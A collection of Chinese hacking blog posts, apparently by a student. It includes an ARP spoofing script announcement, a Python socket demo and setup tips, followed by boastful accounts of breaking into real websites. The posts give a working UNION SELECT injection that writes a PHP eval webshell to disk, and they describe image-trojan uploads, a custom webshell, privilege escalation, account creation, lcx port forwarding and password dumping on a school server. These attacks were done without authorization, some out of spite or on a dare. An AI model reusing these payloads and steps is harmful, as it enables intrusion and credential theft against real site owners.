本工具是由AdianGg(也就是我本人)写的一个基于Python3的小工具,Kali linux自带的Arpspoof功能只能攻击一个目标,这一点就让我很不舒服,因为在学校的时候扫内网基本是要把所有的的存活主机都进行发包欺骗的,我比较菜不知道怎么选中多个目标,所以连夜写了这个脚本,只有短短六十几行,主要目的也是想锻炼一下个人能力,毕竟在Python-Socket通信简单实现中提到过了,我是一个重度工具依赖患者,所以自己实现一下功能,顺便理解一下攻击原理。
强调一下
此工具纯属练手和娱乐用
本人菜狗
界面:
UI.png
目前实现的功能

  • 输入多个IP,每个IP分配一个线程发伪造的Arp包
  • 验证输入内容是否合法(匹配正则)

预计改进内容

  • 增加恢复功能(头疼,忘了加这个功能了)
  • 扫描所在网段的存活主机并支持导入到TargetList
  • 能对TargetList进行删除

也可以开启ip转发配合Driftnet等工具使用,都兼容

效果图
xp.png
使用方法
根据提示依次输入本机IP地址,所要进行攻击的IP地址等等内容,输入IP地址的地方有一个while循环,所以需要手动输入over来结束输入(有提示),然后就自己开始了
第一次自己写东西,很多Bug,基本没有规范的地方
** 希望大家能给我提很多很多的意见和建议,能让我知道更多的不足之处
话说要来联系我和我一起学习嘛?**
下载地址!

https://github.com/Adian-kids/Python.git

前言

笔者最近在学Python和Javascript,写一点自己的学习笔记。
工具的出现无疑是让我们省了不少力气,但是更多的人选择了单纯的依赖工具,对本身的原理只是略知一二或者索性根本不了解,很不幸,我就是工具的深度依赖者,学习的路上因为过分依赖工具出现的坑逐渐多了起来,所以现在只能慢慢的一点一点补基础。

正文

那么问题来了,今天的Socket通信简单实现和我前言说的一大堆有什么关系呢?这个时候就要扯出一个很常用的工具Netcat(NC),这个工具有着瑞士军刀之名,体积小巧,具体功能介绍可看Netcat小结,Netcat就实现了一个通讯的功能,笔者今天的文章简单的用Python实现一下此功能。
和NC一样,分两个端,一个Server.py为服务端,一个Client.py为客户端
下面为两个端的编写所需要的大致思路

Server端

  • 创建Socket
  • 绑定端口
  • 等待连接
  • 开始通讯
  • 关闭连接

Client端

  • 创建Socket
  • 连接目标
  • 开始通讯
  • 关闭连接
    好,既然这样,那我们就开始实现吧!

首先我们先要

from socket import * #调用Socket

Wait!我都开始写文了,这么简单的脚本我当然是已经写出来了
Server.py

from socket import * #调用Socket
address = ('localhost',666)
s = socket(AF_INET,SOCK_STREAM) #服务器之间网络通信,流式socket , for TCP
s.bind(address)#前面ip为空则为本地地址
s.listen(1) #开始TCP监听,监听一个请求
print("Wait For Connect")
conn,addr = s.accept()#前面为套接字,后面为对方机器的ip地址
print("Connected By",addr)
#发送信息
while True:
    data = str(conn.recv(1024),'utf-8')#接收1024字节的字符串
    print("收到---->",data)
    data = input("发送---->")
    conn.send(data.encode())
conn.close()
s.close()

Client.py

from socket import *
address = ('localhost',666)
s = socket(AF_INET,SOCK_STREAM) #服务器之间网络通信,流式socket , for TCP
s.connect(address)
while True:
    data = input("发送---->")
    s.send(data.encode())
    recv = str(s.recv(1024),'utf-8')
    print("接收---->",recv)
s.close()

这个时候得注意一个坑,Python3默认的Str编码为unicode,如果我们直接这样传输字符串的话,接收到的内容都会是这样

b'String'

复制
虽说字符串的的确确已经正常输出了,但是还是要注意规范,解决起来还是蛮简单的,转成Utf-8即可

Str('string','utf8')

复制
注意:服务端与客户端不能直接发送列表,元组,字典。需要字符串化repr(data)。

所有网上的教程基本都是

apt-get install mysql-server

但是实际上,一定会报错
提示没有这个包
我尝试了网上几乎所有的教程
比如更新源,比如直接下载deb包然后dpkg
第二个最坑,因为树莓派是armhf的架构,网上貌似找不到
所以
重点来了:
我们直接安装Mariadb,不要听信百度的谣言

apt-get install mariadb-server

兼容度很高,直接正常配置就可以了

Pentestbox在win10下有自己的想法

无论是toolsmanager还是update都无法执行

我的罪恶起源是sqlmap

1.png

当时我以为是我语法的问题

所以我又

QQ图片20190916101925.png

糟心

后来发现toolsmanager也不能用

看来不是语法问题了


在DL的指导下

问题出在win10上

解决方法:

鼠标右击左上角cmd.exe

然后选择Debug

第二项Properties 

勾选使用旧版控制台


问题解决

2.png 


注:感谢Adrian提供的方法

我只是搬运工


一个乐于助人的大牛给了我一个站让我练手

说走咱就走啊,一言不合就开车

1.jpg

and 1=2直接报错出了路径,这回我打码了,毕竟站是别人给的

然后order by 26返回正常

order by 27返回错误

于是我们

http://xxxx.com/article.php?wid=xxxx UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

没报错

2.jpg

然后在wid=这里加一个-

报错爆出 7 和10

然后开始查询user()

和database()

这时候我看到了了不得的东西

UNION SELECT 1,2,3,4,5,6,database(),version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

root!!!

3.jpg

然后就Happy了

直接UNION SELECT 1,2,3,4,5,6,'<?php eval($_POST[a])?>',version(),9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'D:\\xxxxx\\xx.php'

4.jpg

 

当然,我还是要声明,我不是什么大牛,我也没说本文的技术点又多高

又防止某些狗追着咬我

然后再拿自己的龌龊思想揣测我

想学习web相关的话,我的观点是你需要学习PHP JS MYSQL一类的基础

不懂原理是不行的

会用明小子不算会注入

脚本语言需要,编程语言也需要

 

本文在去年数据丢失了,所以是从贴吧粘贴回来的

 

经证实,网站漏洞已经修复,各位黑阔不要再费时间了

 

==========================================

 

楼主上高中了,忙的一逼啊

6点上学10:30放学

累死

中秋放假我一个人在家,父母都在外地

子年大哥说去路口喝喝啤酒,思考一路走来的得失

我决定一定要做点什么





正文:

尽管他打码了,但是我发现了文章标题1.jpg

百度之,我就不打码了,你们都找得到

2.jpg

找到之后果断注册账号上传,不知道为啥直接.jpg格式的一句话上不去,就换了个图片马3.jpg

然后邪恶的用IIS7.5的解析漏洞Getshell

4.jpg

 

爆菊完毕

5.jpg

 

嘿嘿嘿

 

 

 

 

最近在学PHP

今天晚上0:23的时候我忽然想起原来看教程的时候跟着做过一个php小马

但是当时是完全按照教程敲的,于是乎我决定自己写一个

首先让你们看看帅气的界面

 

本来还打算默默的加个上传,但是实在太晚了



我这里说一下

关于密码

我认为小马没有密码是不行的

因为你日过之后基本就是给后人开路了,容易被爆菊

但是仅仅是密码的话,很多人又不愿意去改默认的密码,就算改了也有很大被爆破的风险

所以我把身份验证改成了GET提交参数,假如你提交的参数是错误的或是你直接访问了页面,你得到的是

根据图一,我们访问的是127.0.0.1/shell.php?x=adian

也就是说假如你想正常使用

你需要知道GET接收的参数是什么+验证的字符是什么

爆破的话通常会爆破密码,而同时爆破密码+GET参数

假如你都改的略微复杂些他就基本没可能爆破出密码了

是这样的,我本身的目标站是一个黑扩站

想日的原因是他装逼,是的,在网上拍一些技术点不高的视频装逼,看到他上万粉丝我有点不开心了

 

结果是dz3.2,果断放弃

旁站无果,几个域名都是一个站

那么打算让我开启C段了吗,那好吧

说走咱就走啊

开车!

批量查询了一下C段,用的百度的一个在线扫描器

导入完毕之后扔进扫描器批量扫

于是我把目标盯上了那个dede

于是我直接去解密了

登陆后台(默认是dede)

直接getshell我就不废话了

getshell后我发现了这个

直接getpass不怕你们知道,反正他改了,这是黑白色的键盘帮我get的,当时我被封ip了

然后登陆服务器(今天截的图)

然后玩着玩着

过来一会,,,我曹这是对我的鄙视吗,

大哥你是在逗我,我看了下好像就是服务器管理员,不知道啥意思,,,这是在藐视我?

尽管我还是没拿下目标,不过好惊悚啊,遇到管理员了,他居然不改密码!

就到这吧,我看他也是个老实人,,,

要不是备案我就格盘了

 

今天本来是拿下了本地一所高中的后台

正在和我挺好的一个哥们嘚瑟

毕竟我长得那么帅(嘿!怎么还打人呢你)

他说有本事你来日我们学校的,日下的话送你一个电子烟

这就很尴尬了,那咱们必须搞一个

-----------------------------------------正文密封线-------------------------------------------------------

打开网站随手加个admin

 

在我随手试了试之后弱口令无果,于是我就开sqlmap判断了一下post注入,结果我一返回首页发现了这个,这明显是登录了啊,,,我也不知道什么鬼

 

 

赶紧重新打开后台,果然直接登录后台了,这算是什么漏洞,求告知

噗,,我给跪了 装了ewebeditor还自己做了上传,那我就不客气了,还能直接上传asp

 

个人喜欢用菜刀啊,然后发现cmd无法执行,重新上传后执行之,通过systeminfo发现可以用pr

pr提权过程如下

直接新建账户

 

开开3389但是连接不上,那么肯定是内网

结果ipconfig居然没东西,,如下图,在我问过大牛之后,他告诉我netstat也可以看到内网ip,,,

诶,还是我太年轻

 

然后使用lcx.exe进行内网转发

然后上getpass

最终我发现了个奇葩的事情

administrator密码和网站后台密码一样,,,早知道我就不费尽周折的添加账户了